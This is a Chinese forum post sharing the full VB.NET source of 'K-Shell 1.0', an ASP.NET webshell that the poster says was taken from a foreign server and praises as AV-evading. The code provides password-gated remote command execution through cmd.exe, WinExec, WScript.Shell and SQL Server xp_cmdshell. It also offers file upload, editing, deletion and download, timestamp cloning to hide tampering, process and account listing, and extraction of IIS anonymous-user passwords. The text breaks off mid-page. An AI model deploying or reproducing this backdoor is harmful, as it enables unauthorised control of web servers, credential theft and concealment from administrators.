[分享] 一个.net webadmin

这个好像功能多一点。。是偶而在一国外服务器上发现的。顺便down了下来。。 不知道大家有没有。。反正我觉得好用而且好像免杀

<%@ Page Language="VB" C  validateRequest="false" aspcompat="true"%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ import namespace="System.Threading" %>
<%@ import namespace="System.Text" %>
<%@ import namespace="System.Security.Cryptography" %>
<script runat="server">
Dim PASSWORD as string = "0a50b9563385aa15468f72a27111d189"   'Hash MD5 of password
'Here , change the default password "kikicoco" to yours
'----------------------------------------------------------------------
'-----------------      K-Shell by kikicoco VHS       -----------------
'-----------------    E-mail: duchaikhtn@gmail.com    -----------------
'-----------------      http://blog.ajaxviet.com      -----------------
'-----------------        http://vnsecurity.com       -----------------
'-----------------              Version 1.0           -----------------
'-----------------            Build (20070226)        -----------------
'----------- This shell base on WebAdmin2.0(beta) By lake2 ------------
'------------ and Asp.Net Security Analyzer by Dinis.cruz  ------------
'----------------------------------------------------------------------
'  Description:
'    1. This program run on ASP.NET environment,control the web directory
'    2. It looks like backdoor , but I wish you like it .
'    3. If you have some words to me , please send me a Email
'  4. This is useful security test tool on windows. I hope that!
'------------
dim url,TEMP1,TEMP2,TITLE as string
Function GetMD5(ByVal strPlain As String) As String
  Dim UE As UnicodeEncoding = New UnicodeEncoding
  Dim HashValue As Byte()
  Dim MessageBytes As Byte() = UE.GetBytes(strPlain)
  Dim md5 As MD5 = New MD5CryptoServiceProvider
  Dim strHex As String = ""
  HashValue = md5.ComputeHash(MessageBytes)
  For Each b As Byte In HashValue
    strHex += String.Format("{0:x2}", b)
  Next
  Return strHex
End Function
Sub Login_click(sender As Object, E As EventArgs)
if GetMD5(Textbox.Text)=PASSWORD then     
  session("kikicoco")=1
  session.Timeout=45
else
  response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>")
end if
End Sub
'Run w32 shell
Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long)  As Long
Sub RunCmdW32(Src As Object, E As EventArgs)
dim command
dim fileObject = Server.CreateObject("Scripting.FileSystemObject")  
dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
If Request.Form("txtCommand1") = "" Then
  command = "dir c:\"
else
  command = Request.Form("txtCommand1")
End If
ExecuteCommand1(command,tempFile)
OutputTempFile1(tempFile,fileObject)
'txtCommand1.text=""
End Sub
function ExecuteCommand1(command, tempFile)
Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
Dim FailIfExists

local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
local_copy_of_cmd = Local_dir+"cmd.exe"
'local_copy_of_cmd= "C:\\WINDOWS\\system32\\cmd.exe"
Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\kiss.exe"
CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
errReturn = WinExec(Target_copy_of_cmd + " /c " + command + "  > " + tempFile , 10)
response.write(errReturn)
thread.sleep(500)
End function
Sub OutputTempFile1(tempFile,oFileSys)
On Error Resume Next
dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0)
resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
    oFile.Close
    Call oFileSys.DeleteFile(tempFile, True)  
End sub
'End w32 shell
'Run WSH shell
Sub RunCmdWSH(Src As Object, E As EventArgs)
dim command
dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
If Request.Form("txtcommand2") = "" Then
  command = "dir c:\"
else
  command = Request.Form("txtcommand2")
End If   
ExecuteCommand2(command,tempFile)
OutputTempFile2(tempFile,fileObject)
txtCommand2.text=""
End Sub
Function ExecuteCommand2(cmd_to_execute, tempFile)
   Dim oScript
   oScript = Server.CreateObject("WSCRIPT.SHELL")
      Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)
End function
Sub OutputTempFile2(tempFile,fileObject)
    On Error Resume Next
dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0)
resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
oFile.Close
Call fileObject.DeleteFile(tempFile, True)
End sub
'End WSH shell
'System infor
Sub output_all_environment_variables(mode)
    Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
    Dim de As DictionaryEntry
For Each de In  environmentVariables
if mode="HTML" then
response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>")
else
if mode="text"
response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline)
end if  
end if
    Next
End sub
Sub output_all_Server_variables(mode)
    dim item
    for each item in request.servervariables
if mode="HTML" then
response.write("<b>" + item + "</b> : ")
response.write(request.servervariables(item))
response.write("<br>")
else
  if mode="text"
   response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
  end if  
end if
           next
End sub
'End sysinfor
'Begin List processes
Function output_wmi_function_data(Wmi_Function,Fields_to_Show)
  dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
  dim fields_split, fields_item,i
  'on error resume next
  table("0","","")
  Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
  winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)     
  
  fields_split = split(Fields_to_Show,",")
  for each item in objProcessInfo
   tr
    Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
    if Ubound(Fields_split)>0 then
     for i = 1 to ubound(fields_split)
      Surround_by_TD(center_(item.properties_.item(fields_split(i)).value))   
     next
    end if
   _tr
  next
End function
Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount)
  dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
  dim fields_split, fields_item,i,count
  newline
  rw("Showing the first " + cstr(MaxCount) + " Entries")
  newline
  newline
  table("1","","")
  Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
  _table
  winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
'  objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)     
  objProcessInfo = winObj.InstancesOf(Wmi_Function)     
  
  fields_split = split(Fields_to_Show,",")
  count = 0
  for each item in objProcessInfo  
   count = Count + 1
   table("1","","")
   tr
    Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
    if Ubound(Fields_split)>0 then
     for i = 1 to ubound(fields_split)
      Surround_by_TD(item.properties_.item(fields_split(i)).value)   
     next
    end if
   _tr
   if count > MaxCount then exit for
  next
End function
'End List processes
'Begin IIS_list_Anon_Name_Pass
Sub IIS_list_Anon_Name_Pass()
  Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP
  
  IIsComputerObj = CreateObject("WbemScripting.SWbemLocator")    ' Create an instance of the IIsComputer object
  providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2")
  nodeObj  = providerObj.InstancesOf("IIsWebVirtualDirSetting") '  - IISwebServerSetting
  
  Dim MaxCount = 20,Count = 0
  hr
  RW("only showing the first "+cstr(MaxCount) + " items")
  hr
  for each item in nodeObj
   response.write("<b>" + item.AppFriendlyName + " </b> -  ")
   response.write("(" + item.AppPoolId + ") ")
  
   response.write(item.AnonymousUserName + " : ")
   response.write(item.AnonymousUserPass)
   
   response.write("<br>")
   
   response.flush
   Count = Count +1
   If Count > MaxCount then exit for
  next  
  hr
End sub
'End IIS_list_Anon_Name_Pass
Sub RunCMD(Src As Object, E As EventArgs)
Try
Dim kProcess As New Process()
Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe")
kProcessStartInfo.UseShellExecute = False
kProcessStartInfo.RedirectStandardOutput = true
kProcess.StartInfo = kProcessStartInfo
kProcessStartInfo.Arguments="/c " & Cmd.text
kProcess.Start()
Dim myStreamReader As StreamReader = kProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
kProcess.Close()
result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
Cmd.text=""
Catch
result.text="This function has disabled!"
End Try
End Sub
Sub CloneTime(Src As Object, E As EventArgs)
existdir(time1.Text)
existdir(time2.Text)
Dim thisfile As FileInfo =New FileInfo(time1.Text)
Dim thatfile As FileInfo =New FileInfo(time2.Text)
thisfile.LastWriteTime = thatfile.LastWriteTime
thisfile.LastAccessTime = thatfile.LastAccessTime
thisfile.CreationTime = thatfile.CreationTime
response.Write("<font color=""red"">Clone Time Success!</font>")
End Sub
sub Editor(Src As Object, E As EventArgs)
dim mywrite as new streamwriter(filepath.text,false,encoding.default)
mywrite.write(content.text)
mywrite.close
response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
end sub
Sub UpLoad(Src As Object, E As EventArgs)
dim filename,loadpath as string
filename=path.getfilename(UpFile.value)
loadpath=request.QueryString("src") & filename
if  file.exists(loadpath)=true then
  response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
  response.End()
end if
UpFile.postedfile.saveas(loadpath)
response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
End Sub
Sub NewFD(Src As Object, E As EventArgs)
url=request.form("src")
if NewFile.Checked = True then
  dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
  mywrite.close
  response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
else
  directory.createdirectory(url & NewName.Text)
  response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
end if
End Sub
Sub del(a)
if right(a,1)="\" then
  dim xdir as directoryinfo
  dim mydir as new DirectoryInfo(a)
  dim xfile as fileinfo
  for each xfile in mydir.getfiles()
   file.delete(a & xfile.name)
  next
  for each xdir in mydir.getdirectories()
   call del(a & xdir.name & "\")
  next
  directory.delete(a)
else
  file.delete(a)
end if
End Sub
Sub copydir(a,b)
dim xdir as directoryinfo
dim mydir as new DirectoryInfo(a)
dim xfile as fileinfo
for each xfile in mydir.getfiles()
  file.copy(a & "\" & xfile.name,b & xfile.name)
next
for each xdir in mydir.getdirectories()
  directory.createdirectory(b & path.getfilename(a & xdir.name))
  call copydir(a & xdir.name & "\",b & xdir.name & "\")
next
End Sub
Sub xexistdir(temp,ow)
if directory.exists(temp)=true or file.exists(temp)=true then
  if ow=0  then
   response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
  elseif ow=1 then
   del(temp)
  else
   dim d as string = session("cutboard")
   if right(d,1)="\" then
    TEMP1=url & second(now) & path.getfilename(mid(replace(d,"
",""),1,len(replace(d,"
",""))-1))
   else
    TEMP2=url & second(now) & replace(path.getfilename(d),"
","")
   end if
  end if
end if
End Sub
Sub existdir(temp)
  if  file.exists(temp)=false and directory.exists(temp)=false then
   response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\")  &" ! Is it a CD-ROM ?');</sc" & "ript>")
   response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>")
   response.End()
  end if
End Sub
Sub RunSQLCMD(Src As Object, E As EventArgs)
Dim adoConn,strQuery,recResult,strResult
if SqlName.Text<>"" then
  adoConn=Server.CreateObject("ADODB.Connection")
  adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
  If Sqlcmd.Text<>"" Then
   strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
     recResult = adoConn.Execute(strQuery)
     If NOT recResult.EOF Then
       Do While NOT recResult.EOF
        strResult = strResult & chr(13) & recResult(0).value
        recResult.MoveNext
       Loop
     End if
     recResult = Nothing
     strResult = Replace(strResult," "," ")
     strResult = Replace(strResult,"<","<")
     strResult = Replace(strResult,">",">")
   resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
   SqlCMD.Text=""
   End if
    adoConn.Close
  End if
End Sub
Function GetStartedTime(ms)
GetStartedTime=cint(ms/(1000*60*60))
End function
Function getIP()
    Dim strIPAddr as string
    If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
        strIPAddr = Request.ServerVariables("REMOTE_ADDR")
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
    Else
        strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
    End If
    getIP = Trim(Mid(strIPAddr, 1, 30))
End Function
Function Getparentdir(nowdir)
dim temp,k as integer
temp=1
k=0
if len(nowdir)>4 then
  nowdir=left(nowdir,len(nowdir)-1)
end if
do while temp<>0
  k=temp+1
  temp=instr(temp,nowdir,"\")
  if temp =0 then
   exit do
  end if
  temp = temp+1
loop
if k<>2 then
  getparentdir=mid(nowdir,1,k-2)
else
  getparentdir=nowdir
end if
End function
Function Rename()
url=request.QueryString("src")
if file.exists(Getparentdir(url) & request.Form("name")) then
  rename=0   
else
  file.copy(url,Getparentdir(url) & request.Form("name"))
  del(url)
  rename=1
end if
End Function
Function GetSize(temp)
if temp < 1024 then
  GetSize=temp & " bytes"
else
  if temp\1024 < 1024 then
   GetSize=temp\1024 & " KB"
  else
   if temp\1024\1024 < 1024 then
    GetSize=temp\1024\1024 & " MB"
   else
    GetSize=temp\1024\1024\1024 & " GB"
   end if
  end if
end if
End Function
Sub downTheFile(thePath)
  dim stream
  stream=server.createObject("adodb.stream")
  stream.open
  stream.type=1
  stream.loadFromFile(thePath)
  response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
  response.addHeader("Content-Length",stream.Size)
  response.charset="UTF-8"
  response.c
  response.binaryWrite(stream.read)
  response.flush
  stream.close
  stream=nothing
  response.End()
End Sub
'H T M L  S N I P P E T S
public sub Newline
  response.write("<BR>")
end sub

public sub TextNewline
  response.write(vbnewline)
end sub
public sub rw(text_to_print)   ' Response.write
  response.write(text_to_print)
end sub
public sub rw_b(text_to_print)
  rw("<b>"+text_to_print+"</b>")
end sub
public sub hr()
  rw("<hr>")
end sub
public sub ul()
  rw("<ul>")
end sub
public sub _ul()
  rw("</ul>")
end sub
public sub table(border_size,width,height)
  rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>")
end sub
public sub _table()
  rw("</table>")
end sub
public sub tr()
  rw("<tr>")
end sub
public sub _tr()
  rw("</tr>")
end sub
public sub td()
  rw("<td>")
end sub
public sub _td()
  rw("</td>")
end sub
public sub td_span(align,name,contents)
  rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>")
end sub
Public sub td_link(align,title,link,target)
  rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>")
end sub
Public sub link(title,link,target)
  rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
end sub
Public sub link_hr(title,link,target)
  rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
  hr
end sub
Public sub link_newline(title,link,target)
  rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
  newline
end sub

public sub empty_Cell(ColSpan)
  rw("<td colspan='"+cstr(colspan)+"'></td>")
end sub
public sub empty_row(ColSpan)
  rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>")
end sub
        Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems)
            dim rowItem
            rowItems = split(rowItems,",")
            response.write("<tr bgcolor="+bgcolor+">")
            for each rowItem in RowItems
                response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>")
            next
            response.write("</tr>")
        end sub
        Public sub TR_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub

        Public sub Surround_by_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub
        Public sub Surround_by_TD_and_Bold(cellContents)
            response.write("<td><b>")
            response.write(cellContents)
            response.write("</b></td>")
        end sub
        Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents)
            response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>")
            response.write(cellContents)
            response.write("</b></font></td>")
        end sub
Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index)
  response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
  response.write("  <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>")
  response.write("    <tr heigth=20>")
  response.write("      <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>")
  response.write("    </tr>")
  response.write("    <tr>")
  response.write("      <td>"+main_Cell_contents+"</td>")
  response.write("    </tr>")
  response.write("  </table>")
  response.write("</div>")
end sub
Public sub Create_Div_open(top,left,width,height,z_index)
  response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
end sub

Public sub Create_Div_close()
  response.write("</div>")
end sub
public sub Create_Iframe(left, top, width, height, name,src)
  rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>")  
  rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
      rw("</span>")
end sub
public sub Create_Iframe_relative(width, height, name,src)
  rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
end sub
public sub return_100_percent_table()
  rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>")
end sub
public sub font_size(size)
  rw("<font size="+size+">")
end sub
public sub end_font()
  rw("</font>")
end sub
public sub red(contents)
  rw("<font color=red>"+contents+"</font>")
end sub
public sub yellow(contents)
  rw("<font color='#FF8800'>"+contents+"</font>")
end sub
public sub green(contents)
  rw("<font color=green>"+contents+"</font>")
end sub
public sub print_var(var_name, var_value,var_description)
  if var_description<> "" Then
   rw(b_(var_name)+" : " + var_value + i_("  ("+var_description+")"))
  else
   rw(b_(var_name)+" : " + var_value)
  end if
  newline
end sub
' Functions
public function br_()
  br_ = "<br>"
end function
public function b_(contents)
  b_ = "<b>"+ contents + "</b>"
end function
public function i_(contents)
  i_ = "<i>"+ contents + "</i>"
end function
public function li_(contents)
  li_ = "<li>"+ contents + "</li>"
end function
public function h1_(contents)
  h1_ = "<h1>"+ contents + "</h1>"
end function
public function h2_(contents)
  h2_ = "<h2>"+ contents + "</h2>"
end function
public function h3_(contents)
  h3_ = "<h3>"+ contents + "</h3>"
end function
public function big_(contents)
  big_ = "<big>"+ contents + "</big>"
end function
public function center_(contents)
  center_ = "<center>"+ cstr(contents) + "</center>"
end function

public function td_force_width_(width)
  td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) +  " border=0>"
end function

public function red_(contents)
  red_ = "<font color=red>"+contents+"</font>"
end function
public function yellow_(contents)
  yellow_ = "<font color='#FF8800'>"+contents+"</font>"
end function
public function green_(contents)
  green_ = "<font color=green>"+contents+"</font>"
end function
Public function link_(title,link,target)
  link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>"
end function
'End HTML SNIPPETS
</script>
<%
if request.QueryString("action")="down" and session("kikicoco")=1 then
  downTheFile(request.QueryString("src"))
  response.End()
end if
Dim hu as string = request.QueryString("action")
if hu="cmd" then
TITLE="CMD.NET"
elseif hu="cmdw32" then
TITLE="ASP.NET W32 Shell"
elseif hu="cmdwsh" then
TITLE="ASP.NET WSH Shell"
elseif hu="sqlrootkit" then
TITLE="SqlRootKit.NET"
elseif hu="clonetime" then
TITLE="Clone Time"
elseif hu="information" then
TITLE="Web Server Info"
elseif hu="goto" then
TITLE="K-Shell 1.0"
elseif hu="pro" then
TITLE="List processes from server"
elseif hu="user" then
TITLE="List User Accounts"
elseif hu="applog" then
TITLE="List Application Event Log Entries"
elseif hu="syslog" then
TITLE="List System Event Log Entries"
elseif hu="auser" then
TITLE="IIS List Anonymous' User details"
else
TITLE=request.ServerVariables("HTTP_HOST")
end if
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<style type="text/css">
body,td,th {
color: #000000;
font-family: Verdana;
}
body {
background-color: #ffffff;
font-size:12px;
}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.style3 {color: #FF0000}
</style>
<head>
<meta http-equiv="Content-Type" c>
<title><%=TITLE%></title>
</head>
<body>
<div align="center">K-Shell 1.0 By <a href="http://blog.ajaxviet.com" target="_blank" title="Welcome to my page:)">kikicoco</a> from Vietnam [<a href="http://vnsecurity.com" target="_blank">VHS</a>]</div>
<hr>
<%
Dim error_x as Exception
Try
if session("kikicoco")<>1 then
'response.Write("<br>")
'response.Write("Hello , thank you for using my program !<br>")
'response.Write("This program is run at ASP.NET Environment and manage the web directory.<br>")
'response.Write("Maybe this program looks like a backdoor , but I wish you like it and don't hack :p<br><br>")
'response.Write("<span class=""style3"">Notice:</span> only click ""Login"" to login.")
%>
<form runat="server">
  Your Password:<asp:TextBox ID="TextBox" runat="server"  TextMode="Password" class="TextBox" />  
  <asp:Button  ID="Button" runat="server" Text="Login" ToolTip="Click here to login"   class="buttom" />
</form>
<%
else
dim temp as string
temp=request.QueryString("action")
if temp="" then temp="goto"
select case temp
case "goto"
  if request.QueryString("src")<>"" then
   url=request.QueryString("src")
  else
   url=server.MapPath(".") & "\"
  end if
call existdir(url)
dim xdir as directoryinfo
dim mydir as new DirectoryInfo(url)
dim hupo as string
dim xfile as fileinfo
%>
<table width="90%"  border="0" align="center">
  <tr>
   <td>Currently Dir:</td> <td><font color=red><%=url%></font></td>
  </tr>
  <tr>
    <td width="13%">Operate:</td>
    <td width="87%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> -
      <%if session("cutboard")<>"" then%>
      <a href="?action=paste&src=<%=server.UrlEncode(url)%>" title="you can paste">Paste</a> -
      <%else%>
Paste -
<%end if%>
<a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit">Quit</a></td>
  </tr>
  <tr>
    <td>
Go to: </td>
    <td>
<%
dim i as integer
for i =0 to Directory.GetLogicalDrives().length-1
  response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
next
%>
</td>
  </tr>
  <tr>
    <td>Tool:</td>
    <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro" >List Processes</a></td>   
  </tr>
  <tr>
    <td> </td>
    <td><a href="?action=applog" >Application Event Log </a> - <a href="?action=user" >List User Accounts</a> - <a href="?action=syslog" >System Log</a> - <a href="?action=auser" >IIS List Anonymous' User details</a></td>   
  </tr>
</table>
<hr>
<table width="90%"  border="0" align="center">
<tr>
<td width="40%"><strong>Name</strong></td>
<td width="15%"><strong>Size</strong></td>
<td width="20%"><strong>ModifyTime</strong></td>
<td width="25%"><strong>Operate</strong></td>
</tr>
      <tr>
        <td><%
  hupo= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
  response.Write(hupo)
  for each xdir in mydir.getdirectories()
   response.Write("<tr>")
   dim filepath as string
   filepath=server.UrlEncode(url & xdir.name)
   hupo= "<td><a href='?action=goto&src=" & filepath & "\" & "'>" & xdir.name & "</a></td>"
   response.Write(hupo)
   response.Write("<td><dir></td>")
   response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
   hupo="<td><a href='?action=cut&src=" & filepath & "\'  target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\'  target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
   response.Write(hupo)
   response.Write("</tr>")
  next
  %></td>
  </tr>
  <tr>
        <td><%
  for each xfile in mydir.getfiles()
   dim filepath2 as string
   filepath2=server.UrlEncode(url & xfile.name)
   response.Write("<tr>")
   hupo="<td>" & xfile.name & "</td>"
   response.Write(hupo)
   hupo="<td>" & GetSize(xfile.length) & "</td>"
   response.Write(hupo)
   response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
   hupo="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"   
   response.Write(hupo)
   response.Write("</tr>")
  next
  response.Write("</table>")
  %></td>
      </tr>
</table>
<script language="javascript">
function del()
{
if(confirm("Are you sure?")){return true;}
else{return false;}
}
function down()
{
if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
else{return false;}
}
</script>
<%
case "information"
dim CIP,CP as string
if getIP()<>request.ServerVariables("REMOTE_ADDR") then
   CIP=getIP()
   CP=request.ServerVariables("REMOTE_ADDR")
else
   CIP=request.ServerVariables("REMOTE_ADDR")
   CP="None"
end if
%>
<div align=center>[ Web Server Information ]        <i><a href="javascript:history.back(1);">Back</a></i></div><br>
<table width="80%"  border="1" align="center">
  <tr>
    <td width="40%">Server IP</td>
    <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  </tr>
  <tr>
    <td height="73">Machine Name</td>
    <td><%=Environment.MachineName%></td>
  </tr>
  <tr>
    <td>Network Name</td>
    <td><%=Environment.UserDomainName.ToString()%></td>
  </tr>
  <tr>
    <td>User Name in this Process</td>
    <td><%=Environment.UserName%></td>
  </tr>
  <tr>
    <td>OS Version</td>
    <td><%=Environment.OSVersion.ToString()%></td>
  </tr>
  <tr>
    <td>Started Time</td>
    <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  </tr>
  <tr>
    <td>System Time</td>
    <td><%=now%></td>
  </tr>
  <tr>
    <td>IIS Version</td>
    <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  </tr>
  <tr>
    <td>HTTPS</td>
    <td><%=request.ServerVariables("HTTPS")%></td>
  </tr>
  <tr>
    <td>PATH_INFO</td>
    <td><%=request.ServerVariables("PATH_INFO")%></td>
  </tr>
  <tr>
    <td>PATH_TRANSLATED</td>
    <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  <tr>
    <td>SERVER_PORT</td>
    <td><%=request.ServerVariables("SERVER_PORT")%></td>
  </tr>
    <tr>
    <td>SeesionID</td>
    <td><%=Session.SessionID%></td>
  </tr>
  <tr>
    <td colspan="2"><span class="style3">Client Infomation</span></td>
  </tr>
  <tr>
    <td>Client Proxy</td>
    <td><%=CP%></td>
  </tr>
  <tr>
    <td>Client IP</td>
    <td><%=CIP%></td>
  </tr>
  <tr>
    <td>User</td>
    <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  </tr>
</table>
<table align=center>
<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
<tr>
  <td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td>
  <td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td>
</tr>
</table>
<%
case "cmd"
%>
<form runat="server">
  <p>[ CMD.NET for WebAdmin ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
